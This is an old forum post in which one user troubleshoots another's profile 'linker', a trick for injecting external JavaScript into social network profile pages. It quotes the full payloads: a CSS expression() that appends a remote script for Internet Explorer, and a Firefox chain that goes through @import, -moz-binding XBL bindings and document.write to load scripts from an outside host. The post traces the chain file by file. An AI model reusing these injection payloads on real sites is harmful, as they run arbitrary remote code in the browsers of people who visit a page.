[quote=switpotato][quote=myparis]this linker is not working in some version of Firefox,
i tested it and proves it,
not yet stable. Hope theres a new linker...[/quote]
wat do u meant when u say not stable?
all i know that linker is [b]working for IE and Firefox ver.2 and higher[/b] ...[/quote]
Yah its working 100% in [b]IE[/b],
but in some version of [b]Fx[/b] the linker doesnt work, im using [b]Firefox 2.0.0.14[/b]
Here's the proof:
I view your profile in
In [b]IE6[/b]:
[url=http://i173.photobucket.com/albums/w76/myparis16/IE.jpg][img]http://i173.photobucket.com/albums/w76/myparis16/IE.jpg[/img][/url]
and
[b]Firefox 2.0.0.14[/b]
[url=http://i173.photobucket.com/albums/w76/myparis16/Fx.jpg][img]http://i173.photobucket.com/albums/w76/myparis16/Fx.jpg[/img][/url]
see your page is not working in my [b]Fx[/b]... And theres no problem with my [b]Fx[/b]
This is your code right?
[quote][color=orange]<style type='text/css'>@import url(http://h1.ripway.com/memberofthecradle/css.swf);</style>[/color]
[color=blue]<a id='cradle' style="obj:expres/**/sion(function b(){c=document.createElement('script');c.src=cradle.innerHTML; navBg.appendChild(c)}b());text:expres/**/sion(cradle.style.obj='0');
visibility:hidden">http://h1.ripway.com/apolpie/forotherusequery/monix.js</a>[/color][/quote]
The [color=orange]orange[/color] part is the linker for [b]Fx[/b],
The [color=blue]blue[/color] part is the linker for [b]IE[/b]
So lets focus on the [color=orange]orange[/color] part:
[quote][color=orange]<style type='text/css'>@import url(http://h1.ripway.com/memberofthecradle/css.swf);</style>[/color][/quote]
First it will load the file:
[b]
http://h1.ripway.com/memberofthecradle/css.swf[/b]
And it contains this code:
[quote]body {
-moz-binding:url("http://h1.ripway.com/memberofthecradle/rss.swf#thecradle");
}[/quote]
Then it will load the file:
[b]
http://h1.ripway.com/memberofthecradle/rss.swf[/b]
And it contains this code:
[quote]<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="thecradle">
<implementation>
<constructor><![CDATA[document.write('<script src=http://h1.ripway.com/thecradle/fxloader.swf></script>')]]></constructor>
</implementation>
</binding>
</bindings>[/quote]
Finally it will load the file:
[b]
http://h1.ripway.com/thecradle/fxloader.swf[/b]
And it contains this code:
[quote]function fxLoader(){
a=document.getElementById("cradle").innerHTML
b=document.createElement("script")
b.type="text/javascript"
b.src=a
document.getElementsByTagName("head")[0].appendChild(b)
}
fxLoader()[/quote]
This 3 files must be loaded successfully to make the linker work:[b]
http://h1.ripway.com/memberofthecradle/css.swf
http://h1.ripway.com/memberofthecradle/rss.swf
http://h1.ripway.com/thecradle/fxloader.swf[/b]
but the problem is the css code:
[quote]-moz-binding[/quote]
is not working in some Fx,
which is being used in [b]
http://h1.ripway.com/memberofthecradle/css.swf [/b]
to load the [b]
http://h1.ripway.com/memberofthecradle/rss.swf [/b] and [b]
http://h1.ripway.com/thecradle/fxloader.swf [/b]
heres the proof:
[url=http://i173.photobucket.com/albums/w76/myparis16/Ss.jpg][img]http://i173.photobucket.com/albums/w76/myparis16/Ss.jpg[/img][/url]
Only the [b]
http://h1.ripway.com/memberofthecradle/css.swf [/b] is loaded, so thats why the linker did not work...
__________________________________________________________________
[quote][b]Updated:[/b]
Linker will not work if your a NoScript addon user for Fx.[/quote]
Last edited by myparis (2008-04-19 13:48:17)